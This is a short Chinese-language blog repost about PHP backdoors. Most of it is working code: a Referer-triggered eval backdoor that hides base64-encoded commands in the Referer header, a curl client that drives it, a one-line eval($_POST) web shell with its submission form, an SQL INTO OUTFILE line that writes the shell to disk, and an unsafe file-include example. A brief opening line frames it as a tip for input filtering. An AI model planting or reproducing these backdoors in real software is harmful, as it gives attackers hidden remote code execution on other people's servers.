zoukankan      html  css  js  c++  java
  • [转]关于PHP后门

    http://www.oschina.net/code/snippet_164175_21174?p=1#comments

    当过滤  POST  GET   COOKIE 时 , 注意$_SERVER['HTTP_REFERER']
    1.php  上传后门代码
    《?php
    //1.php
    header('Content-type:text/html;charset=utf-8');
    parse_str($_SERVER['HTTP_REFERER'], $a);
    if(reset($a) == '10' && count($a) == 9) {
       eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
    }



    2.php 本地
    《?php
    //2.php
    header('Content-type:text/html;charset=utf-8');
    //要执行的代码
    $code = <<
    phpinfo();
    CODE;
    //进行base64编码
    $code = base64_encode($code);
    //构造referer字符串
    $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
    //后门url
    $url = 'http://localhost/test1/1.php';
    $ch = curl_init();
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => FALSE,
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_REFERER => $referer
    );
    curl_setopt_array($ch, $options);
    echo curl_exec($ch);


    ------------------
    注意CURL


    -------------------------
    《?php @eval_r($_POST['c']);?》



    《html>  
    《body>  
    《form action="a.php" method="post">  
    《input type="text" name="c" value="phpinfo();">  
    《input type="submit" value="submit">  
    《/form>  
    《/body>  
    《/html>  

    -------------------


    select '《?php @eval_r($_POST["c"]);?》' INTO OUTFILE 'e:/m.php'  


    --------------
    $filename=$_GET['xbid'];
    include ($filename);
    //危险的include函数,直接编译任何文件为php格式运行
  • 相关阅读:
    python 类定义 继承
    BAYSY2 的LVDS引脚 笔记
    Fedora20-32bit cross-compiling arm-linux-gcc4.3.2
    以冒泡排序为例--malloc/free 重定向stdin stdout
    笔记:程序内存管理 .bss .data .rodata .text stack heap
    第一章 数值和码制
    《将博客搬至CSDN》
    Servlet 3.0 新特性
    java Servlet接口及应用
    C语言输出单个汉字字符
  • 原文地址:https://www.cnblogs.com/linewman/p/9918884.html
Copyright © 2011-2022 走看看